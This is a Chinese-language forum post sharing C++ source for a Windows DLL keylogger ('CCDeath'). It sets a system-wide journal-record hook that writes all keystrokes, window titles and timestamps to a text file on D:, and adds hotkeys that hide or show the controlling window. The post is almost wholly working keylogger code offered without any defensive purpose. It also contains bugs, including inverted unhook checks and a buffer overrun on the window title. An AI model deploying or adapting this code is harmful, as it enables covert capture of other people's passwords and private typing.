找回密碼
 立即注冊(cè)

QQ登錄

只需一步,快速開(kāi)始

搜索
查看: 2573|回復(fù): 0
打印 上一主題 下一主題
收起左側(cè)

WINDOWS鍵盤(pán)鉤子

[復(fù)制鏈接]
跳轉(zhuǎn)到指定樓層
樓主
ID:72008 發(fā)表于 2015-1-11 20:10 | 只看該作者 回帖獎(jiǎng)勵(lì) |倒序?yàn)g覽 |閱讀模式
  1. CCDeath_DLL.cpp文件

  2. #include "afx.h"//file頭文件
  3. #include "windows.h"

  4. #pragma data_seg("MySec")//創(chuàng)建一個(gè)節(jié)
  5. HHOOK g_hKeyBoard=NULL;//鍵盤(pán)記錄
  6. HHOOK g_hFuncKeyBoard=NULL;//用來(lái)隱藏和顯示窗口
  7. HWND g_hWnd=NULL;//保存一個(gè)窗口句柄,必須副初值
  8. HWND g_hLastFocusWnd=NULL;//記錄上次得到焦點(diǎn)的窗口句柄
  9. const int g_KeyPressMass=0x80000000;//鍵盤(pán)掩碼常量
  10. char ch=NULL,str[10]={0};//ch保存虛擬鍵的值
  11. FILE *stream=NULL; //文件流輸入文件
  12. HWND g_hCurrentFocusWnd=NULL;//當(dāng)前焦點(diǎn)的窗口句柄
  13. char szTitle[200]={0};//當(dāng)前窗口的名稱(chēng)
  14. char szTime[100]={0};//當(dāng)前的日期
  15. char g_prevChar=NULL;//保存上一次按鍵值
  16. #pragma data_seg()
  17. #pragma comment(linker,"/section:MySec,RWS")//連接到連接器里面
  18. //
  19. //
  20. //
  21. //處理過(guò)程
  22. LRESULT CALLBACK JournalRecordProc(
  23. int code, // hook code
  24. WPARAM wParam, // undefined
  25. LPARAM lParam // address of message being processed
  26. )
  27. {

  28. if(code==HC_ACTION)
  29. {
  30. EVENTMSG *pEvtMsg = (EVENTMSG *)lParam;
  31. //和時(shí)間
  32. stream = fopen("D:\\CCDeath.txt","a+t");//創(chuàng)建一個(gè)文件流指針向該文件
  33. //處理按鍵消息
  34. if(pEvtMsg->message==WM_KEYDOWN)
  35. {
  36. int vKey= LOBYTE(pEvtMsg->paramL);//取得虛擬鍵值

  37. g_hCurrentFocusWnd=GetForegroundWindow();//取得當(dāng)前活動(dòng)窗口句柄
  38. if(g_hLastFocusWnd!=g_hCurrentFocusWnd)
  39. {
  40. GetWindowText(g_hCurrentFocusWnd,szTitle,256);//獲得標(biāo)題
  41. g_hLastFocusWnd=g_hCurrentFocusWnd;

  42. SYSTEMTIME mytime;//獲得當(dāng)前時(shí)間與日期
  43. GetLocalTime(&mytime);
  44. CString m_time,m_Space,m_Back;

  45. m_time.Format("\r\n記錄時(shí)間:%d年%d月%d日,%02d小時(shí)%d分鐘%d秒\r\n記錄的文件名:",mytime.wYear,mytime.wMonth,\
  46. mytime.wDay,mytime.wHour,mytime.wMinute,mytime.wSecond);
  47. m_Space="\r\n---------------------鍵盤(pán)鉤子為您記錄 BY:DEBUG----------------------";//開(kāi)頭
  48. m_Back="\r\n記錄的內(nèi)容:\r\n";//結(jié)束
  49. fprintf(stream,"%s%s%s%s",m_Space,m_time,szTitle,m_Back);//寫(xiě)入文件
  50. }
  51. //測(cè)試SHIFT,CAPTION,NUMLOCK等鍵是否按下
  52. int IsShift = GetKeyState(0x10);
  53. int IsNumLock = GetKeyState(0x90);
  54. int IsCapsLock = GetKeyState(0x14);
  55. bool bShift=(IsShift & g_KeyPressMass)==g_KeyPressMass;
  56. bool bCapsLock=((IsCapsLock & 1) ==1);
  57. bool bNumLock=((IsNumLock & 1) ==1);
  58. if(vKey>=48 && vKey<=57)//數(shù)字0到9
  59. {
  60. if(!bShift)//shift+1=!上檔鍵
  61. {
  62. fprintf(stream,"%c",vKey);//寫(xiě)入0到九
  63. }
  64. }
  65. if(vKey>=65 && vKey<=90)//字符大寫(xiě)A-Z
  66. {
  67. if(!bCapsLock)//沒(méi)有大小鎖定鍵
  68. {
  69. if(!bShift)//Shit+A=a \A+32=a;
  70. {
  71. ch=vKey+32;

  72. }
  73. else ch=vKey;
  74. }
  75. fprintf(stream,"%c",ch);
  76. }
  77. if (vKey >=96 && vKey<=105) // 小鍵盤(pán)0-9
  78. {
  79. if (bNumLock) fprintf(stream,"%c",vKey-96+48);
  80. }
  81. if (vKey>=186 && vKey<=222) // 其他鍵
  82. {
  83. switch (vKey)
  84. {
  85. case 186:if (!bShift) ch=';'; else ch=':';break;
  86. case 187:if (!bShift) ch='='; else ch='+';break;
  87. case 188:if (!bShift) ch=','; else ch='<' ;break;
  88. case 189:if (!bShift) ch='-'; else ch='_';break;
  89. case 190:if (!bShift) ch='.'; else ch='>';break;
  90. case 191:if (!bShift) ch='/'; else ch='?';break;
  91. case 192:if (!bShift) ch='`'; else ch='~';break;
  92. case 219:if (!bShift) ch='['; else ch='{';break;
  93. case 220:if (!bShift) ch='\\'; else ch='|';break;
  94. case 221:if (!bShift) ch=']'; else ch='}';break;
  95. case 222:if (!bShift) ch='\''; else ch='\"';break;
  96. default:ch='n';break;
  97. }
  98. if (ch!='n') fprintf(stream,"%c",ch); //n是110n回車(chē) 此時(shí)應(yīng)該換行才對(duì)


  99. }
  100. if(vKey==9) //TAB
  101. fprintf(stream,"%c",'\t');
  102. if(vKey==13) //回車(chē)鍵
  103. fprintf(stream,"%c",'\n');

  104. }

  105. fclose(stream);

  106. return CallNextHookEx(g_hKeyBoard,code,wParam,lParam);
  107. }
  108. if(code<0)
  109. {
  110. return CallNextHookEx(g_hKeyBoard,code,wParam,lParam);
  111. }
  112. // return CallNextHookEx(g_hKeyBoard,code,wParam,lParam);


  113. }
  114. //用來(lái)程序的隱藏
  115. LRESULT CALLBACK KeyboardProc(
  116. int code, // hook code
  117. WPARAM wParam, // virtual-key code
  118. LPARAM lParam // keystroke-message information
  119. )
  120. {
  121. if(VK_F3==wParam)
  122. {
  123. ShowWindow(g_hWnd,SW_SHOW);
  124. }
  125. if(VK_F2==wParam)
  126. {
  127. ShowWindow(g_hWnd,SW_HIDE);

  128. }
  129. if(VK_F4==wParam)
  130. {
  131. SendMessage(g_hWnd,WM_CLOSE,0,0);
  132. UnhookWindowsHookEx(g_hFuncKeyBoard);
  133. UnhookWindowsHookEx(g_hKeyBoard);

  134. }
  135. return 0;

  136. }





  137. //安裝鉤子
  138. void InstallHook(HWND hWnd)
  139. {
  140. g_hWnd=hWnd;//對(duì)窗口進(jìn)行操作,比如隱藏之類(lèi)的
  141. if(g_hKeyBoard==NULL)//安全性判斷
  142. {
  143. g_hKeyBoard=SetWindowsHookEx(WH_JOURNALRECORD,JournalRecordProc,GetModuleHandle("CCDeath_DLL"),0);
  144. }
  145. if(g_hFuncKeyBoard==NULL)
  146. {
  147. g_hFuncKeyBoard=SetWindowsHookEx(WH_KEYBOARD,KeyboardProc,GetModuleHandle("CCDeath_DLL"),0);
  148. }
  149. }
  150. //御載鉤子
  151. void UnloadHook()
  152. {
  153. if(!g_hKeyBoard)
  154. {
  155. UnhookWindowsHookEx(g_hKeyBoard);
  156. g_hKeyBoard=NULL;
  157. }
  158. if(!g_hFuncKeyBoard)
  159. {
  160. UnhookWindowsHookEx(g_hFuncKeyBoard);
  161. g_hFuncKeyBoard=NULL;
  162. }

  163. }
復(fù)制代碼


分享到:  QQ好友和群QQ好友和群 QQ空間QQ空間 騰訊微博騰訊微博 騰訊朋友騰訊朋友
收藏收藏 分享淘帖 頂 踩

相關(guān)帖子

回復(fù)

使用道具 舉報(bào)

本版積分規(guī)則

手機(jī)版|小黑屋|51黑電子論壇 |51黑電子論壇6群 QQ 管理員QQ:125739409;技術(shù)交流QQ群281945664

Powered by 單片機(jī)教程網(wǎng)

快速回復(fù) 返回頂部 返回列表